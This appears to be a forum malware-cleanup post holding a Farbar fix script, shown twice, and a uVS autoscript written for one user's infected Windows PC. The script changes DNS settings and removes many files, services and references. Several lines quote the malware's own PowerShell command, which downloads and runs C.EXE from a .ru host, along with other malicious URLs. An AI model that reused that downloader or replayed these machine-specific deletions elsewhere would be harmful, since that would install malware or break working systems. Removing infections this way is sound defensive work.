CustomCLSID: HKU\S-1-5-21-538949740-2122644480-3000222818-1001_Classes\CLSID\{4299B2BA-5F79-4F6E-ACF8-11DAB8B7E79D}\InprocServer32 -> C:/Users/allmo/AppData/Local/Mail.Ru/Disk-O/CloudShell64.dll => No File
ContextMenuHandlers1_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
ContextMenuHandlers4_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
ContextMenuHandlers5_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
ContextMenuHandlers3_S-1-5-21-538949740-2122644480-3000222818-1001: [MailRuCloudContextMenu] -> {4299B2BA-5F79-4F6E-ACF8-11DAB8B7E79D} => C:\Users\allmo\AppData\Local\Mail.Ru\Disk-O\CloudShell64.dll -> No File
Task: {B2F4AC84-A8D0-4524-9363-BFF5A5911A00} - \Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask -> No File <==== ATTENTION
HKU\S-1-5-21-538949740-2122644480-3000222818-1001\...\StartupApproved\Run: => "ycAutoLaunch_FD415F1C0D2EE624C8FD1A8B1AB51C7C"
HKU\S-1-5-21-538949740-2122644480-3000222818-1001\...\StartupApproved\Run: => "go"
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION

EmptyTemp:
Reboot:

 

  

CustomCLSID: HKU\S-1-5-21-538949740-2122644480-3000222818-1001_Classes\CLSID\{4299B2BA-5F79-4F6E-ACF8-11DAB8B7E79D}\InprocServer32 -> C:/Users/allmo/AppData/Local/Mail.Ru/Disk-O/CloudShell64.dll => No File
ContextMenuHandlers1_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
ContextMenuHandlers4_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
ContextMenuHandlers5_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
ContextMenuHandlers3_S-1-5-21-538949740-2122644480-3000222818-1001: [MailRuCloudContextMenu] -> {4299B2BA-5F79-4F6E-ACF8-11DAB8B7E79D} => C:\Users\allmo\AppData\Local\Mail.Ru\Disk-O\CloudShell64.dll -> No File
Task: {B2F4AC84-A8D0-4524-9363-BFF5A5911A00} - \Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask -> No File <==== ATTENTION
HKU\S-1-5-21-538949740-2122644480-3000222818-1001\...\StartupApproved\Run: => "ycAutoLaunch_FD415F1C0D2EE624C8FD1A8B1AB51C7C"
HKU\S-1-5-21-538949740-2122644480-3000222818-1001\...\StartupApproved\Run: => "go"
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION

EmptyTemp:
Reboot:

;uVS v4.1.1 [http://dsrt.dyndns.org]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

setdns VirtualBox Host-Only Network\4\{BF7F9408-BFDF-41A2-B6A9-7800FFD65588}\8.8.8.8,8.8.4.4
setdns Ethernet 2\4\{CD136755-868B-46FE-938C-DAEC90D57315}\8.8.8.8,8.8.4.4
deldirex %SystemDrive%\USERS\ALLMO\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER

delref & 'C:\USERS\ALLMO\APPDATA\LOCAL\COMD\COMMA.PS1' -FILE 'C:\USERS\ALLMO\APPDATA\LOCAL\COMD\C.EXE' -URL 'HTTP://CROWELECTRIC.RU/YTZ11ZR8K52O5HN03A58AG5AZAHW20DV'
delref & 'C:\USERS\ALLMO\APPDATA\LOCAL\COMD\COMMA.PS1' -FILE 'C:\USERS\ALLMO\APPDATA\LOCAL\COMD\C.EXE' -URL 'HTTP://CROWELECTRIC.RU/YTZ11ZR8K52O5HN03A58AG5AZAHW20DV'
delref HTTP://BARTATI.RU/?UTM_SOURCE=UOUA03&UTM_CONTENT=94680EE36B5752B1077D793C494BCC56&UTM_TERM=6FBC9EE1E93EA45C9200EF7E3AC81C0E&UTM_D=20180523&UTM_MEDIUM=P_15528_
delref HTTP://ALTAKHO.RU
delref HTTP://CLASSELECTRIC.RU/5R611UB8CX2F5P701D58ES6HQOFG2QBG
delall %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\COMD\SEMI.VBS
delref %SystemDrive%\USERS\ALLMO\APPDATA\ROAMING\CURL\WGET_1_19_4.EXE
delref %SystemDrive%\USERS\ALLMO\APPDATA\ROAMING\CURL\WGET.EXE
apply

deltmp
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\IGDLH64.INF_AMD64_463164D40C3D26CE\INTELCPHECISVC.EXE
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\MAIL.RU\MAILRUUPDATER.EXE
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\SYSWOW64\MAPSTOASTTASK.DLL
delref %SystemRoot%\SYSWOW64\MAPSUPDATETASK.DLL
delref %Sys32%\NOTIFIER.EXE
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\NVFONTCACHE\NVFONTCACHE.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\SPYHUNTER\SPYHUNTER4.EXE
delref %SystemDrive%\PROGRA~3\DCDB5D89\EC347725.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCLR.SYS
delref %SystemRoot%\SYSWOW64\W32TIME.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS
delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DXGMMS2.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS
delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS
delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS
delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL
delref %SystemRoot%\SYSWOW64\LSM.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\MAIL.RU\SPUTNIK\IE_ADDON_DLL.DLL
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCALLOW\DUCKGO\DUCKGO.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref %SystemRoot%\SYSWOW64\IE4UINIT.EXE
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref {BBACC218-34EA-4666-9D7A-C78F2274A524}\[CLSID]
delref {5AB7172C-9C11-405C-8DD5-AF20F3606282}\[CLSID]
delref {A78ED123-AB77-406B-9962-2A5D9D2F7F30}\[CLSID]
delref {F241C880-6982-4CE5-8CF7-7085BA96DA5A}\[CLSID]
delref {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\[CLSID]
delref {9AA2F32D-362A-42D9-9328-24A483E2CCC3}\[CLSID]
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\MAIL.RU\DISK-O\CLOUDSHELL32.DLL
delref %Sys32%\CFDECODE64.AX
delref {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref {A910D941-9DA9-4656-8933-AA1EAE01F76E}\[CLSID]
delref %Sys32%\DRIVERS\VNVDIMM.SYS
delref %Sys32%\DRIVERS\INVDIMM.SYS
delref %Sys32%\DRIVERS\NVDIMMN.SYS
delref %Sys32%\DRIVERS\MICROSOFT.BLUETOOTH.LEGACY.LEENUMERATOR.SYS
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\WONDERSHARE\WONDERSHARE HELPER COMPACT\WSHELPER.EXE
delref %Sys32%\BLANK.HTM
delref APPMGMT\[SERVICE]
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref TBS\[SERVICE]
delref VMMS\[SERVICE]
delref MESSENGER\[SERVICE]
delref RDSESSMGR\[SERVICE]
delref %Sys32%\DRIVERS\PARTIZAN.SYS
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\18.091.0506.0007\AMD64\FILESYNCSHELL64.DLL
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\18.091.0506.0007\FILECOAUTH.EXE
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\18.091.0506.0007\FILESYNCSHELL.DLL
delref %SystemDrive%\PROGRAM FILES\ISKYSOFT\FILMORA VIDEO EDITOR (RUSSIAN)\IMAGEHOST.EXE
delref %Sys32%\TETHERINGSETTINGHANDLER.DLL
delref %Sys32%\QUICKACTIONSPS.DLL
delref %Sys32%\CHTADVANCEDDS.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delref %SystemDrive%\PROGRAM FILES\MICROSOFT OFFICE\ROOT\VFS\PROGRAMFILESCOMMONX64\MICROSOFT SHARED\EQUATION\EQNEDT32.EXE
delref %SystemRoot%\SYSWOW64\TTLSEXT.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\TAPILUA.DLL
delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL
delref %SystemRoot%\SYSWOW64\MAPSBTSVCPROXY.DLL
delref %SystemRoot%\SYSWOW64\PERCEPTIONSIMULATIONEXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\IGDLH64.INF_AMD64_463164D40C3D26CE\IGFXEXPS32.DLL
delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL
delref %SystemRoot%\SYSWOW64\MAPSCSP.DLL
delref %SystemRoot%\SYSWOW64\LISTSVC.DLL
delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL
delref %SystemRoot%\SYSWOW64\WBEM\NLMCIM.DLL
delref %SystemRoot%\SYSWOW64\RMSROAMINGSECURITY.DLL
delref %SystemRoot%\SYSWOW64\SYSTEMSETTINGSBROKER.EXE
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\SMARTSCREEN.EXE
delref %SystemRoot%\SYSWOW64\GPSVC.DLL
delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL
delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL
delref %SystemDrive%\USERS\ALLMO\APPDATA\LOCAL\GO!\APPLICATION\GO.EXE
;-------------------------------------------------------------

restart